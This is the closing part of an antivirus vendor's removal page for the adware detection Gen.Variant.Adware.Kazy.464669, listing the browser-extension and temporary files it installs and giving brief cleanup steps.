C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\foreground.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\no\messages.json (328 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\System.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\vi\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\popup.js (364 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon128.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsv2684.tmp (5256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl2695.tmp\System.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_install_227031\JUR0CxdplxCY.exe (15037 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Adware.Kazy.464669_602eaeccae

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Adware.Kazy.464669_602eaeccae

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet